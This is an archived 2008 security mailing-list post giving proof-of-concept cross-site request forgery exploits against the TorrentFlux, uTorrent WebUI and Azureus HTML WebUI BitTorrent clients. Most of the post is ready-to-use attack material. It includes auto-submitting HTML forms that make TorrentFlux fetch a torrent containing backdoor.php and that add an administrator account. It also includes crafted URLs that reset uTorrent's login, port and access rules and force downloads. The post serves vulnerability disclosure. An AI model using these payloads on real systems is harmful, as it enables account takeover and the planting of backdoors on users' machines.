Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

BitTorrent Clients and CSRF

from [th3 . r00k . nospam] Network Security [Permanent Link]
Subject: BitTorrent Clients and CSRF
Date: 18 Apr 2008 08:33:51 -0000 
The following are proof of concept exploits against three bittorrent clients.  
uTorrent' WebUI, Azurues's "HTML WebUI", and TorrentFlux.

More information:
http://www.rooksecurity.com/blog/?p=10

TorrentFlux v2.3(Latest)
http://sourceforge.net/projects/torrentflux/

If you force TorrentFlux to download a torrent that contains a file 
backdoor.php you will be able to execute it by browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to 
know the username.
<html>
<form id='file_attack' method="post" 
action="http://localhost/torrentflux_2.3/html/index.php";>
<input type=hidden name="url_upload" 
value="http://localhost/backdoor.php.torrent";>
<input type=submit value='file attack'>
</from>
<html>
<script>
document.getElementById('file_attack').submit();
</script>

<html>
Add an admistrative account:
<form id=?create_admin? method=?post? 
action=?http://localhost/torrentflux_2.3/html/admin.php?op=addUser?>
<input type=hidden name=?newUser? value=?sadmin?>
<input type=hidden name=?pass1&#8243; value=?password?>
<input type=hidden name=?pass2&#8243; value=?password?>
<input type=hidden name=?userType? value=1>
<input type=submit value=?create admin?>
</form>
</html>
<script>
document.getElementById(?create_admin?).submit();
</script>

uTorrent?s WebUI is also affected:
http://forum.utorrent.com/viewtopic.php?id=14565
force file download:
http://127.0.0.1:8080/gui/?action=add-url&s=http://localhost/backdoor.torrent

utorrent change administrative login information:
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.username&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.password&v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.port&v=4096
After the username or password have been changed then the browser must 
re-authenticate.
http://127.0.0.1:8080/gui/?action=setsetting&s=webui.restrict&v=127.0.0.1/24,10.1.1.1
So is Azurues?s HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=u&upurl=http://localhost/backdoor.torrent
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • BitTorrent Clients and CSRF, th3 . r00k . nospam <=
Previous by Date:  [ MDVSA-2008:089 ] - Updated poppler packages fix vulnerability, security
Next by Date:  5th avenue Shopping Cart SQL Injection, noreply
Previous by Thread:  [ MDVSA-2008:089 ] - Updated poppler packages fix vulnerability, security
Next by Thread:  5th avenue Shopping Cart SQL Injection, noreply
Indexes:  [Date] [Thread] [Top] [All Lists]